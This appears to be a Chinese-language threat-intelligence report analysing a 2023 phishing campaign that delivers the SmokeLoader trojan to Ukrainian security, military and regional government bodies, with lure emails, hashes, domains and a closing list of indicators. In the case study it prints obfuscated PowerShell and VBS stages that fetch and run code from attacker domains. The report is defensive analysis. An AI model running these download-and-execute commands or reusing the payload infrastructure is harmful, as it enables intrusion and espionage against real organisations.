概 述
自2022年2月24日俄烏戰(zhàn)爭爆發(fā)以來,雙方長期陷入膠著狀態(tài),從烏方的反擊到瓦格納軍事政變,戰(zhàn)爭有利形勢正逐步地傾向于烏方,尤其是近日俄羅斯私營軍事集團(tuán)瓦格納反叛事件(目前瓦格納事件已平息),更體現(xiàn)了當(dāng)前形勢的變化莫測,由此引發(fā)了國際社會的廣泛關(guān)注。從俄方來看,除了做好轉(zhuǎn)攻為守的戰(zhàn)略切換外,還得防止內(nèi)部各方勢力的分裂,但在這樣一個復(fù)雜的形勢下,他們并沒有放棄網(wǎng)絡(luò)戰(zhàn)這樣的一個選項,反而結(jié)合當(dāng)時的形勢來制定一些合適攻擊策略。尤其是2023年4月下旬開始,烏方已經(jīng)開始了大反攻計劃,由此牽涉到更加頻繁的資源調(diào)度和物資結(jié)算,這給了俄方的黑客組織一些機會,我們也從4月末開始觀察到一系列與財務(wù)結(jié)算相關(guān)攻擊比如“5月賬單”、“待支付賬單”、“對賬單和對賬清單”和“發(fā)貨清單”以及 “添加賬單”等為誘餌的郵件攻擊,攻擊目標(biāo)也包含烏克蘭國家安全局、軍事管理局、州政府等等。對于交戰(zhàn)雙方而言,能夠通過低成本的網(wǎng)絡(luò)戰(zhàn)來獲取實時的軍事和政治情報,是一項長期且可持續(xù)的戰(zhàn)術(shù)策略。
【資料圖】
此外我們還觀察到一些與戰(zhàn)爭相關(guān)事件有著緊密關(guān)聯(lián)的攻擊,比如5月中旬俄羅斯向烏克蘭西部赫梅利尼茨基州發(fā)動大規(guī)模無人機攻擊造成了大量人員受傷后,5月29號左右就出現(xiàn)了偽裝成醫(yī)藥公司賬單的攻擊,攻擊的主要目標(biāo)為該州的國家安全局;同樣是5月中旬,烏克蘭切爾尼戈夫州遭到俄羅斯導(dǎo)彈打擊,5月29日左右就出現(xiàn)了偽裝成烏克蘭礦石加工和采礦設(shè)備修理廠的發(fā)票攻擊,攻擊的主要目標(biāo)是烏克蘭切爾尼戈夫州政府??梢姡W(wǎng)絡(luò)攻擊某種程度上在和一些戰(zhàn)爭行動打配合,而這種配合又會反過來給予攻擊方更加實時的情報。
關(guān)于俄烏局勢下的網(wǎng)絡(luò)戰(zhàn),我們曾進(jìn)行過多次深入的分析和追蹤,發(fā)布了《針對烏克蘭邊防局和國防部攻擊活動深度分析》、《【深度分析】烏克蘭戰(zhàn)爭背后的網(wǎng)絡(luò)攻擊和情報活動》和《【網(wǎng)絡(luò)戰(zhàn)】烏克蘭戰(zhàn)爭下的最新網(wǎng)絡(luò)攻擊活動綜合報告》等。對于戰(zhàn)爭沖突的雙方來說,無論是悄無聲息的戰(zhàn)前準(zhǔn)備期還是變化莫測的交戰(zhàn)期,基于情報需求的網(wǎng)絡(luò)間諜活動都是一種低成本且高收益的重要選項。本文將詳細(xì)闡述和分析我們近期觀察到的一些針對烏克蘭的網(wǎng)絡(luò)攻擊事件,通過這些攻擊事件,我們關(guān)聯(lián)出了一些黑客組織使用的基礎(chǔ)設(shè)施、誘餌文件以及竊密木馬等信息并做進(jìn)一步的分析。從攻擊的時間上來看,這批攻擊主要集中在2023年5月和6月前后,這兩個時間段都是俄烏戰(zhàn)爭的關(guān)鍵節(jié)點;從攻擊載荷來看,黑客主要以投遞SmokeLoader木馬為主,用于下發(fā)竊密組件獲取情報。SmokeLoader是一款用于維護(hù)攻擊持續(xù)的守護(hù)型木馬,其采用多層shellcode進(jìn)行加密偽裝以繞過安全軟件的安全檢測。該木馬曾經(jīng)被多次使用于針對烏克蘭的網(wǎng)絡(luò)竊密活動中,我們曾在2021年針對烏克蘭邊防局和國防部攻擊活動中發(fā)現(xiàn)了利用該木馬的攻擊,這背后可能是同一個組織所為,他們擁有非常豐富的攻擊武器包括Saint Bot、Raccoon、AutoIT木馬等,SaintBot木馬在2021年也被用于對格魯吉亞的攻擊中。
2 攻擊事件分析
從4月份烏克蘭計劃開始反攻以來,在殘酷戰(zhàn)爭的背后,基于網(wǎng)絡(luò)攻擊的情報活動也沒有停歇。我們在5月到6月前后,觀測到了一系列針對烏克蘭的網(wǎng)絡(luò)攻擊事件。在我們觀測到的這些網(wǎng)絡(luò)攻擊中,黑客組織偽裝成烏克蘭制藥公司、醫(yī)療物資和設(shè)備的庫存和分配監(jiān)督機構(gòu)、國際運輸公司、礦石加工和采礦設(shè)備修理廠等實體向烏克蘭軍事管理局、安全局、切爾尼戈夫州政府等機構(gòu)發(fā)起了郵件攻擊。這大概是因為,在烏克蘭的反攻戰(zhàn)斗中,伴隨著戰(zhàn)爭推進(jìn)和人員傷亡,烏克蘭軍方和政府需要對藥品、醫(yī)療物資、作戰(zhàn)軍用設(shè)備等戰(zhàn)略資源進(jìn)行頻繁的采購和調(diào)度,這其中必然會和制藥公司、運輸公司、設(shè)備修理廠等供應(yīng)商打交道,進(jìn)而產(chǎn)生一些訂單和賬單的往來。該黑客組織正是利用這個大背景,冒充這些供應(yīng)商向烏克蘭的軍事和政府等機構(gòu)進(jìn)行社會工程學(xué)攻擊,一旦對方由于戰(zhàn)事緊迫,忙于物資調(diào)度和結(jié)算而疏于防范或放松警惕,錯誤地相信了釣魚郵件的內(nèi)容,攻擊者就很可能成功向目標(biāo)設(shè)備植入SmokeLoader木馬,進(jìn)而竊取到烏方的作戰(zhàn)計劃、物資調(diào)度計劃等高等機密信息,而使自己一方在戰(zhàn)爭中贏得先機或取得進(jìn)攻或防御的主動權(quán)。我們下面列舉幾個攻擊事件對該黑客組織的釣魚攻擊進(jìn)行詳細(xì)說明。
圖1是一封發(fā)送自5月5日的釣魚郵件:發(fā)件人偽裝成了烏克蘭國際運輸公司“ATL”,收件人是烏克蘭切爾諾夫策州軍事管理局的工作人員,郵件主題為“Додаю рахунок”,中文意思是“添加賬單”,郵件附件為“pax_2023_AB1058.zip”,解壓后為名稱為“pax_2023_AB1058..js”的JavaScript腳本文件,其執(zhí)行后會從惡意服務(wù)器地址“http://homospoison.ru/one/portable.exe”下載名稱為portable.exe 的SmokeLoader木馬,然后利用該木馬對攻擊目標(biāo)實施進(jìn)一步的攻擊行動。
圖1 針對烏克蘭切爾諾夫策州軍事管理局的攻擊郵件
圖2是一封發(fā)送自5月29日的釣魚郵件,攻擊者偽裝成烏克蘭制藥公司“Промарма”的工作人員向烏克蘭國家安全局赫梅利尼茨基州分局和伊萬諾-弗蘭科夫斯克州分局的工作人員發(fā)起了郵件攻擊。郵件主題為“рахунок за травень”,中文意思是“5月賬單”。郵件正文包括 “З повагою”和“Лариса Лям?на ;0442008009”,“З повагою”是烏克蘭語,意為“敬禮”。通常用在正式的商務(wù)信函或公函中,這個短語通常用作信件的結(jié)尾禮貌用語。而“Лариса Лям?на ;0442008009”分別為聯(lián)系人名和聯(lián)系電話。郵件附帶有兩個附件,分別為名為“акт_зв?рки_рахунки.zip”(對賬單賬戶)的壓縮文件和名為“акт_зв?рки_та_рахунки.html”(對賬單和賬戶)的html文件。壓縮文件解壓后,我們發(fā)現(xiàn)其和惡意html文件” акт_зв?рки_та_рахунки.html”的hash值相同。該html文件被打開后,會釋放名稱為“акт_зв?рки_в?д_05_2023р.js”、“рахунок_№415_2023.js”和“рахунок_№416_2023.js”的惡意JavaScript腳本文件。經(jīng)分析,我們發(fā)現(xiàn)這三個腳本文件只是名稱不同,它們的hash和內(nèi)容完全相同。其執(zhí)行后會從惡意服務(wù)器地址“http://premiumjeck.site/one/renew.exe”下載名稱為renew.exe 的SmokeLoader木馬,然后利用該木馬對攻擊目標(biāo)實施進(jìn)一步的攻擊行動。
圖2 針對烏克蘭安全局的攻擊郵件
我們還觀測到在5月29日前后,該黑客組織除了攻擊烏克蘭國家安全局,其同時又對烏克蘭的多個軍事和政府等敏感機構(gòu)發(fā)起了網(wǎng)絡(luò)攻擊。圖3是部分相關(guān)攻擊使用的網(wǎng)絡(luò)攻擊郵件截圖。
圖3 關(guān)聯(lián)到的部分攻擊郵件
我們將該黑客組織這段時間使用的部分定向攻擊郵件的相關(guān)信息列到表1。結(jié)合前面的攻擊事件和表1,我們可以看到,黑客構(gòu)造了相似的郵件向目標(biāo)實施網(wǎng)絡(luò)攻擊。該黑客組織除了將發(fā)件人偽裝成烏克蘭國際運輸公司、烏克蘭制藥公司向烏克蘭切爾諾夫策州軍事管理局、烏克蘭國家安全局發(fā)起攻擊外,其還將發(fā)件人偽裝成烏克蘭醫(yī)療物資和設(shè)備的庫存和分配監(jiān)督機構(gòu)、礦石加工和采礦設(shè)備修理廠等實體的工作人員向更多的目標(biāo)實施網(wǎng)絡(luò)攻擊。其使用了 “對賬單和對賬清單”、“發(fā)票”和“待付賬單”等內(nèi)容作為郵件主題來誘使目標(biāo)相信郵件內(nèi)容。一旦受害者相信郵件內(nèi)容并執(zhí)行了郵件附件中的惡意程序,惡意SmokeLoader木馬就被植入到了受害者的計算機上。
表1部分定向攻擊郵件相關(guān)信息
時間 | 郵件主題 | 發(fā)件人 | 收件人 |
2023/5/5 8:20 | Додаю рахунок | beliy@atl.ua | infra@bukoda.gov.ua; kelm_rda@bukoda.gov.ua; korup@bukoda.gov.ua |
2023/5/29 8:38 | акт зв?рки та рахунки | ТОВ С?р?он | kelm_rda@bukoda.gov.ua; keltd@i.ua; kelvinmark199@outlook.com |
2023/5/29 9:07 | рахунок за травень | ТОВ НВСПама-?нтертех | usateknik@gmail.com; usbu_hml@ssu.gov.ua; usbu_ivf@ssu.gov.ua |
2023/5/29 15:51 | Рахунок-фактура | Бухгалтер | novgadm_sobez@cg.gov.ua; ost@cg.gov.ua; oz_post@cg.gov.ua; pladm_post@cg.gov.ua |
2023/5/29 16:01 | Рахунок-фактура | ДП ?зюм?нка | infra@bukoda.gov.ua; kelm_rda@bukoda.gov.ua; kitsman_rda@bukoda.gov.ua; korup@bukoda.gov.ua |
2023/5/29 16:56 | акт зв?рки та рахунки | ДП ?зюм?нка | kelm_rda@bukoda.gov.ua; kitsman_rda@bukoda.gov.ua |
2023/5/30 16:28 | Рахунок до оплати | ТОВ МЕТАЛЛОПРОКАТ | post@volynrada.gov.ua |
從攻擊郵件的收件人我們可以看出,這些網(wǎng)絡(luò)攻擊是針對烏克蘭國家安全局機構(gòu)人員、烏克蘭沃倫州地方議會機構(gòu)人員、烏克蘭切爾尼戈夫州政府人員以及烏克蘭切爾諾夫策州軍事管理局機構(gòu)人員發(fā)起的。部分相關(guān)受害部門相關(guān)信息見圖4、圖5、圖6和圖7。
圖4 目標(biāo)為烏克蘭國家安全局相關(guān)信息
圖5 目標(biāo)為烏克蘭沃倫州地方議會相關(guān)信息
圖6 目標(biāo)為烏克蘭切爾尼戈夫州政府相關(guān)信息
圖7 目標(biāo)為烏克蘭切爾諾夫策州軍事管理局相關(guān)信息
3 黑客攻擊分析
3.1 基礎(chǔ)設(shè)施
我們將檢測到的這些魚叉郵件的惡意附件和其投放的惡意文件信息整理到表2,從表2中我們可以看到,這些惡意文件類型包含html、JavaScript、vhd、 exe和zip壓縮包文件以及rar壓縮包文件。它們在VirusTotal上的首次上傳時間最早為5月4日,最新為5月30日。
表2 攻擊郵件附件和后續(xù)投放的惡意文件列表
文件名稱 | 文件類型 | 首次上傳時間 | MD5 |
Акти_та_рахунки.rar | rar | 2023-05-29 | C912EDCEB30CA0BEB505F31F022690B4 |
Акти_та_рахунки.vhd | vhd | 2023-05-29 | 4fd9c773b8c4683dfe0ef18c43c2f7e7 |
AKT_26_05_2023p.js pax_CB00219_26_05_2023p.js акт_зв?рки_в?д_05_2023р.js рахунок_№416_2023.js рахунок_№415_2023.js | JavaScript | 2023-05-29 | c5ba8159cbb49d89e0fb07b5a93c507b |
renew.exe | SmokeLoader | 2023-05-29 | e0ffa7d71c70c4ef2cddf0fa8d951128 |
акт_зв?рки_рахунки.zip | zip | 2023-05-29 | D26BFEE018DBDC10328ACAF307191F43 |
акт_зв?рки_та_рахунки.html | html | 2023-05-29 | 07b0f47e2c9fadf6bb742405b1fa712c |
pax_2023_AB1058.zip | Zip | 2023-05-04 | 3de79fc46c7f32807397309d52001b25 |
pax_2023_AB1058.js | JavaScript | 2023-05-04 | 12f77d1be4344fb88f1093550b092ab6 |
portable.exe | SmokeLoader | 2023-05-10 | 8b75d4e0ecaaf72018e4ad13783a275d |
Рахунок (без ПДВ) № 28 в?д 28.05.2023.zip | Zip | 2023-05-30 | 1f04e7b0b1aee265980c72a9ea88428e |
AKT_28_05_2023p._pax_28_05_2023p.vbs | JavaScript | 2023-05-30 | 642917731c4f19a1b7a1fab2333a84d2 |
trust.exe | SmokeLoader | 2023-05-30 | 1f95b8c2dc09a84f6a9fe6f74dbf7d96 |
我們對這些惡意文件分析后,發(fā)現(xiàn)在這些網(wǎng)絡(luò)攻擊中,該黑客組織使用的惡意服務(wù)器IP地址為“176.124.193.111”,該服務(wù)器用于惡意代碼和惡意程序的分發(fā)。并且攻擊者同時申請了多個惡意域名(見表3)和該服務(wù)器綁定。
表3 惡意服務(wù)綁定的惡意域名
internetcygane.ru | hopentools.site | americanocoffea.ru |
jskgdhjkdfhjdkjhd844.ru | premiumjeck.site | polinamailserverip.ru |
lamazone.site |
我們再以惡意服務(wù)器地址“176.124.193.111”綁定的以上域名和攻擊者用于投放惡意SmokeLoader木馬的服務(wù)器所綁定的域名“homospoison.ru”為線索進(jìn)行關(guān)聯(lián)分析,我們發(fā)現(xiàn)了該黑客組織所使用的更多的惡意文件(見表4)和惡意域名(見表5)。這些惡意文件有的是作為郵件附件發(fā)送給攻擊目標(biāo),有的是最終投放的惡意SmokeLoader木馬。文件在VirusTotal的首次上傳時間最早為2023年5月4日,最新為2023年6月4日。結(jié)合我們最初檢測到的那幾次網(wǎng)絡(luò)攻擊,可以看出此次針對烏克蘭軍事和政府等機構(gòu)的攻擊分別發(fā)生在5月初前后和6月初前后。
表4 關(guān)聯(lián)到的其他惡意文件
文件名稱 | 文件類型 | 首次上傳時間 | MD5 |
無 | SmokeLoader | 2023-06-01 | 2d7ea02ae54d6618c6b9e5db1616c12d |
renew.exe | SmokeLoader | 2023-05-29 | 01a3bd7d854596b067a4f92910fb6135 |
trust.exe | SmokeLoader | 2023-05-30 | 849126bef3df579dd82bc1a0b4df48ce |
portable.exe | SmokeLoader | 2023-05-05 | 8f05b8ea15b88c441219cf8310010df0 |
payload_1.exe | SmokeLoader | 2023-05-04 | 68bc4ce7b6c15f1f5a40e361b2214fce |
pax_BT192.js | JavaScript | 2023-05-10 | e10e450ec0eb8dd6f25e32964357b5db |
10654557474.zip | Droper | 2023-06-04 | a3e9ab9e687bdf0f7d64d8a99c0bc79d |
script | Html | 2023-05-29 | 48ac6f2f7dc6ef83b92dd020b1c0b658 |
a.exe | PE Downloader | 2023-05-30 | 8ce1f6882edc51f701bbe648e40dd133 |
a.exe | PE Downloader | 2023-05-05 | 005bcf051418d05c2750b593278c9fc8 |
a.exe | PE Downloader | 2023-05-06 | 765dd659c5a5a6926483b71e9f96c6cc |
a.exe | PE Downloader | 2023-05-05 | 0f7b882782215a347db43e0d23faa659 |
a.exe | PE Downloader | 2023-05-05 | 55e57673944332f4108aa00d0978d9a3 |
a.exe | PE Downloader | 2023-05-06 | 23ae96501f126d3b38b1bedf18bfbea3 |
表5 關(guān)聯(lián)到的其他惡意域名
freesitucionap.com | maximprofile.net | infomalilopera.ru |
azartnyjboy.com | alegoomaster.com | homospoison.ru |
coudzoom.ru |
我們再對該黑客組織使用的14個惡意域名分析后發(fā)現(xiàn),除了有4個域名注冊自烏克蘭域名服務(wù)商“UKRNAMES”,其余均注冊自位于俄羅斯的域名服務(wù)商。它們分別是“REGRU-RU”、“REG.RU, LLC”、“RU-CENTER-RU”和“REGTIME-RU”。這些域名綁定的IP地址除了“195.123.219.57”屬于荷蘭主機服務(wù)商“Green Floid LLC”外,其余均屬于位于俄羅斯莫斯科的主機服務(wù)商“Dolgova Alena Andreevna”、“ IQHost Ltd”和“ Cloud Assets LLC”(見表6)。從表6中我們還可以看到,這14個惡意域名的注冊時間最早是4月28日,最新為5月30日,這些域名的創(chuàng)建時間也和此次攻擊時間相吻合。
表6 惡意域名注冊信息
域名 | 創(chuàng)建時間 | 過期時間 | 域名服務(wù)商 | 解析IP地址 | 主機服務(wù)商 |
internetcygane.ru | 2023年5月30日 | 2024年5月30日 | REGRU-RU | 176.124.193.111 | Dolgova Alena Andreevna |
hopentools.site | 2023年5月30日 | 2024年5月30日 | REG.RU, LLC | ||
americanocoffea.ru | 2023年5月29日 | 2024年5月29日 | REGRU-RU | ||
jskgdhjkdfhjdkjhd844.ru | 2023年5月29日 | 2024年5月29日 | RU-CENTER-RU | ||
premiumjeck.site | 2023年4月28日 | 2024年4月28日 | REG.RU, LLC | ||
polinamailserverip.ru | 2023年5月11日 | 2024年5月11日 | RU-CENTER-RU | ||
lamazone.site | 2023年5月11日 | 2024年5月11日 | REG.RU, LLC | ||
freesitucionap.com | 2023年5月29日 | 2024年5月29日 | UKRNAMES | 195.123.219.57 | Green Floid LLC |
maximprofile.net | 2023年5月29日 | 2024年5月29日 | UKRNAMES | ||
infomalilopera.ru | 2023年5月29日 | 2024年5月29日 | REGTIME-RU | ||
azartnyjboy.com | 2023年5月29日 | 2024年5月29日 | UKRNAMES | ||
alegoomaster.com | 2023年5月29日 | 2024年5月29日 | UKRNAMES | ||
homospoison.ru | 2023年4月28日 | 2024年4月28日 | REGRU-RU | 193.106.175.177 | IQHost Ltd |
coudzoom.ru | 2023年4月24日 | 2024年4月24日 | REGRU-RU | 193.106.175.177 77.232.37.148 | IQHost Ltd Cloud Assets LLC |
3.2 攻擊目標(biāo)
從攻擊目標(biāo)上看,該黑客組織主要攻擊烏克蘭安全局、烏克蘭沃倫州議會、烏克蘭切爾尼戈夫州政府和烏克蘭切爾諾夫策州軍事管理局等機構(gòu)(見圖8)。攻擊者主要通過向這些機構(gòu)的工作人員發(fā)送帶有惡意附件的攻擊郵件,向攻擊目標(biāo)投放SmokeLoader木馬。而從攻擊目標(biāo)所處的地理位置來看,只有切爾尼戈夫州(烏克蘭北部)處于俄烏戰(zhàn)爭的交戰(zhàn)區(qū)域內(nèi),其它州包括赫梅利尼茨基州(烏克蘭西部)、伊萬諾-弗蘭科夫斯克州(烏克蘭西部)、切爾諾夫策州(烏克蘭西部)和沃倫州(烏克蘭西北部)等均位于遠(yuǎn)離戰(zhàn)場的區(qū)域。表面上看似乎與俄烏的一線戰(zhàn)場關(guān)聯(lián)度不高,但從網(wǎng)絡(luò)戰(zhàn)的角度思考,這可能是攻擊者避重就輕的一種迂回攻擊的思路。通常情況下軍事、國安、政府等核心部門依靠電報系統(tǒng)完成情報信息的上傳下達(dá),這些系統(tǒng)的核心資源網(wǎng)絡(luò)都會實施物理隔離、電磁屏蔽等安全防護(hù)手段,尤其在戰(zhàn)爭狀態(tài)下,一線戰(zhàn)場的涉密人員處于高度警惕和防備的狀態(tài),常見的網(wǎng)絡(luò)攻擊手段是極難成功的。而在戰(zhàn)場的大后方,不論是防護(hù)措施還是人員的思想意識都相對薄弱。因此,攻擊者選擇針對遠(yuǎn)離戰(zhàn)場的核心機構(gòu)目標(biāo)展開網(wǎng)絡(luò)攻擊成功率無疑會大增。一方面同樣能夠竊取到所需的情報,另一方面還可以作為前期偵察的據(jù)點開展橫移滲透、網(wǎng)絡(luò)破壞等更深入的攻擊活動。
圖8 攻擊目標(biāo)
3.3 組織歸屬
從攻擊目標(biāo)上看,該黑客組織目前的攻擊活動帶有明顯的軍事意圖,該定向攻擊是針對烏克蘭軍事、議會和政府部門等敏感機構(gòu)發(fā)起的。此外,根據(jù)我們的基礎(chǔ)設(shè)施分析,黑客使用的惡意域名和惡意服務(wù)器絕大多來自俄羅斯,再加上該黑客組織用于網(wǎng)絡(luò)攻擊活動的惡意服務(wù)器上只有SmokeLoader這一種惡意程序(SmokeLoader最早于2011年在俄語黑客論壇上由名為SmokeLdr的成員出售,并且從2014年3月之后,該木馬僅出售給講俄語的黑客)。因此,不管從該組織的攻擊目標(biāo)、其所使用的木馬還是其使用的惡意域名和惡意服務(wù)器等基礎(chǔ)設(shè)施來看,該黑客組織都很符合俄羅斯黑客組織的習(xí)慣。再結(jié)合俄烏戰(zhàn)爭的大背景,尤其是6月份前后,俄烏雙方在戰(zhàn)場上的新動向,我們認(rèn)為此次攻擊活動是由俄羅斯黑客組織發(fā)起的。我們會持續(xù)關(guān)注該黑客組織的相關(guān)基礎(chǔ)設(shè)施變化以對其動向進(jìn)行持續(xù)追蹤。
4 攻擊案例分析
我們來看該黑客組織其中的一次攻擊活動。如圖9所示,在此次攻擊中,攻擊者先在自己的惡意服務(wù)器“176.124.193.111”上配置和部署好惡意VBS代碼和SmokeLoader木馬,然后向烏克蘭沃倫州議會的工作人員投遞帶有惡意附件“Рахунок (без ПДВ) № 28 в?д 28.05.2023.zip”的魚叉郵件,“Рахунок (без ПДВ) № 28 в?д 28.05.2023.zip”文件解壓后是名稱為“AKT_28_05_2023p._pax_28_05_2023p.vbs”的惡意腳本文件。其執(zhí)行后會使用PowerShell從惡意服務(wù)器地址“http://176.124.193.111”請求事先部署在其上的惡意VBS代碼執(zhí)行,這段惡意VBS代碼會從惡意服務(wù)器地址“http://176.124.193.111/antirecord/trust.exe”下載SmokeLoader木馬到受害者的設(shè)備執(zhí)行。通過上述過程,攻擊者最終成功向攻擊目標(biāo)投放了SmokeLoader木馬。
圖9 攻擊流程圖
此次攻擊中,攻擊者使用了惡意域名americanocoffea.ru”和“jskgdhjkdfhjdkjhd844.ru”,它們均解析到IP地址為“176.124.193.111”的惡意服務(wù)器。該惡意服務(wù)器配置了惡意VBS代碼,用于動態(tài)返回黑客下一階段攻擊的惡意程序的下載地址(見圖10)。
圖10 惡意域名綁定的惡意服務(wù)器信息
4.1 誘餌郵件投遞
此次攻擊始于一封將來源偽裝成烏克蘭基輔電子政務(wù)相關(guān)工作人員的攻擊郵件(見圖11),此郵件是發(fā)送給烏克蘭沃倫州議會的工作人員。整個郵件看起來像是一個付款通知賬單郵件:郵件以“Рахунок до оплати(待付賬單)”為標(biāo)題,“Рахунок (без ПДВ) № 28 в?д 28.05.2023(無增值稅發(fā)票號碼28,發(fā)票日期為2023年5月28日)”為誘餌文檔名稱,正文是 “З повагою,Владана Данишевич +380980143363 гол. бух”,翻譯過來為“敬禮,Владана Данишевич(人名),+380980143363(電話),首席會計師”,正文這樣寫是為了增加這份郵件的可信度。
圖11 攻擊者投放的攻擊郵件
附件“Рахунок (без ПДВ) № 28 в?д 28.05.2023.zip”解壓后是名稱為" AKT_28_05_2023p._pax_28_05_2023p.vbs"的惡意腳本文件。該腳本將大量內(nèi)容編碼為整數(shù)數(shù)組,并且還對其余內(nèi)容進(jìn)行了嚴(yán)重的隨機化字符串混淆處理。如圖12所示,我們對該惡意腳本進(jìn)行動態(tài)調(diào)試。惡意腳本首先使用lbound()、mid()、asc()、chr()等運算函數(shù)將被編碼為整數(shù)的內(nèi)容解密計算后賦值給名稱為“CzVSrYTOisCktDpoRvcYijGYVaUu”的字符串變量,然后將“字符串變量CzVSrYTOisCktDpoRvcYijGYVaUu”作為參數(shù)傳到“vvKfrwrFOsLdtXrsBjHbpTP”函數(shù),最后調(diào)用“execute”函數(shù)執(zhí)行解密后的惡意代碼。
圖12 調(diào)試加密的js腳本
我們跟蹤“execute”函數(shù),到達(dá)了該惡意代碼解密后執(zhí)行的明文代碼處(見圖13)。去除垃圾字符后,該惡意腳本最終執(zhí)行的代碼為“C:\\\\Windows\\\\System32\\\\cmd.exe" /c powErshEll -nop -w hiddEn -Ep bypass -Enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AYQBtAGUAcgBpAGMAYQBuAG8AYwBvAGYAZgBlAGEALgByAHUAIgApAA==。該段惡意代碼執(zhí)行的內(nèi)容Base64解碼后為:IEX (New-Object Net.Webclient).downloadstring("http://americanocoffea.ru"),即其會從遠(yuǎn)程服務(wù)器“americanocoffea.ru”獲取遠(yuǎn)程惡意代碼后繼續(xù)執(zhí)行。
圖13 解密出惡意代碼
4.2 遠(yuǎn)程代碼執(zhí)行
我們訪問地址“http://americanocoffea.ru”,發(fā)現(xiàn)其返回的惡意代碼為“$path = $Env:temp+"\\\\wOvgI.exe"; $client = New-Object System.Net.WebClient; $client.downloadfile("http://americanocoffea.ru/antirecord/trust.exe",$path); Start-Process -FilePath $path“,如圖14所示。該惡意代碼會從遠(yuǎn)程服務(wù)器地址”http://americanocoffea.ru/antirecord/trust.exe“下載惡意程序“trust.exe”去執(zhí)行。圖15為遠(yuǎn)程服務(wù)器地址“http://americanocoffea.ru/antirecord”托管惡意程序“trust.exe”的詳細(xì)信息??梢钥吹皆搻阂獬绦蜃詈蟮男薷臅r間為2023年5月30日08時42分,文件大小為274K。
圖14 惡意服務(wù)器返回的惡意代碼
圖15 惡意服務(wù)托管的惡意程序
4.3 SmokeLoader執(zhí)行
下載執(zhí)行的“trust.exe”惡意文件為SmokeLoader木馬,SmokeLoader是一種加載器,其主要功能是下載和安裝其他惡意軟件(例如勒索軟件、銀行木馬等)到受害者的系統(tǒng)。該木馬最早于2011年在俄語黑客論壇上由名為SmokeLdr的成員出售,并且從2014年3月之后,該木馬僅出售給講俄語的黑客。SmokeLoader的傳播方式通常是通過垃圾郵件、惡意鏈接、漏洞利用等方式進(jìn)行。由于Smoke Loader木馬的靈活性和不斷發(fā)展的能力,它已經(jīng)成為了黑客和犯罪團(tuán)伙中廣泛使用的一種惡意軟件。
該SmokeLoader木馬執(zhí)行后,會使用HeapAlloc函數(shù)在其進(jìn)程堆空間上申請內(nèi)存并修改內(nèi)存屬性為rwe,接著將存儲在木馬數(shù)據(jù)段的惡意代碼通過一系列移位和xor計算進(jìn)行解密,再將解密后的shellcode拷貝到申請的堆空間,最后跳轉(zhuǎn)到堆上的shellcode執(zhí)行,圖16是跳轉(zhuǎn)到shellcode執(zhí)行處的代碼。
圖16 跳轉(zhuǎn)到shellcode處執(zhí)行
Shellcode執(zhí)行后,會使用VirtualAlloc函數(shù)申請內(nèi)存空間,然后解密第二段shellcode并拷貝到申請的內(nèi)存空間,接著再跳轉(zhuǎn)執(zhí)行第二個shellcode,圖17是跳轉(zhuǎn)到第二個shellcode執(zhí)行處的代碼。
圖17 跳轉(zhuǎn)到第二個shellcode處執(zhí)行
第二個shellcode使用進(jìn)程挖空技術(shù)將解密后的第三段shellcode填充到SmokeLoader木馬的“.text”段地址空間去執(zhí)行,圖18是跳轉(zhuǎn)到第三個shellcode執(zhí)行處的代碼。
圖18 跳轉(zhuǎn)到第三個shellcode處執(zhí)行
第三個shellcode執(zhí)行SmokeLoader核心代碼,SmokeLoader核心代碼執(zhí)行后會從遠(yuǎn)程服務(wù)器地址“http://jskgdhjkdfhjdkjhd844.ru/”獲取惡意命令“$path = $Env:temp+"\\\\YokusmD.exe"; $client = New-Object System.Net.WebClient; $client.downloadfile("http://americanocoffea.ru/antirecord/trust.exe",$path); Start-Process -FilePath $path”(如圖19所示),然后從“http://americanocoffea.ru/antirecord/trust.exe”地址處下載下一階段的惡意程序執(zhí)行。
圖19 惡意服務(wù)器返回的惡意代碼
不過截止目前,下載執(zhí)行的用于下一階段攻擊的“http://americanocoffea.ru/antirecord/trust.exe”是我們分析的SmokeLoader木馬自身。惡意服務(wù)器的這種配置實際上是一個惡意代碼的輪詢策略。在發(fā)動有效攻擊前,SmokeLoader木馬通過下載自身進(jìn)行輪詢,一旦準(zhǔn)備向目標(biāo)發(fā)起攻擊,黑客便會在其惡意服務(wù)器上重新配置更復(fù)雜或更高級的攻擊武器,以實現(xiàn)其特定的攻擊目的。
5 總 結(jié)
在俄烏戰(zhàn)爭中,隨著戰(zhàn)事的推進(jìn)和烏方的反攻,戰(zhàn)爭形勢似乎在朝著對俄羅斯不利的方向進(jìn)展。俄方黑客組織基于前線的進(jìn)攻和防御需要對烏方進(jìn)行網(wǎng)絡(luò)攻擊也都是老操作了。我們對俄烏網(wǎng)絡(luò)戰(zhàn)下來自俄羅斯的黑客組織的最新攻擊活動進(jìn)行了分析,通過以上分析我們可以看到,該黑客組織此次對烏克蘭的軍事、議會和政府等敏感機構(gòu)進(jìn)行網(wǎng)絡(luò)攻擊很可能是為了竊取烏方的作戰(zhàn)情報信息,以輔助俄方在前線戰(zhàn)場上進(jìn)行攻擊或防御決策。我們對此次攻擊中俄方黑客組織使用的基礎(chǔ)設(shè)施、攻擊目標(biāo)等方面進(jìn)行了全面的分析,并對最近出現(xiàn)的一次攻擊活動進(jìn)行了詳細(xì)的分析。從我們分析的結(jié)果來看,俄方黑客組織使用的大量惡意域名和用于托管惡意文件的虛擬主機等網(wǎng)絡(luò)基礎(chǔ)設(shè)施大部分來源于俄羅斯。這說明,在針對烏方的網(wǎng)絡(luò)攻擊中,隨著戰(zhàn)事的不斷推進(jìn),俄方黑客已經(jīng)不屑于再遮遮掩掩,他們索性選擇直來直去、簡單粗暴地實施攻擊。不過如果我們從另外一個角度來看,俄方使用自己的域名和服務(wù)器或許也是不得已而為之的妥協(xié)方案,畢竟基礎(chǔ)設(shè)施在俄羅斯之外,攻擊成果很容易被烏方和其盟友直接“截胡”,到頭來白忙一場。我們會持續(xù)關(guān)注俄烏戰(zhàn)爭和俄烏網(wǎng)絡(luò)戰(zhàn)下該黑客組織的相關(guān)基礎(chǔ)設(shè)施變化以對該組織的動向進(jìn)行持續(xù)追蹤。
6IOC
6.1 域名
internetcygane.ru
hopentools.site
americanocoffea.ru
jskgdhjkdfhjdkjhd844.ru
premiumjeck.site
polinamailserverip.ru
lamazone.site
freesitucionap.com
azartnyjboy.com
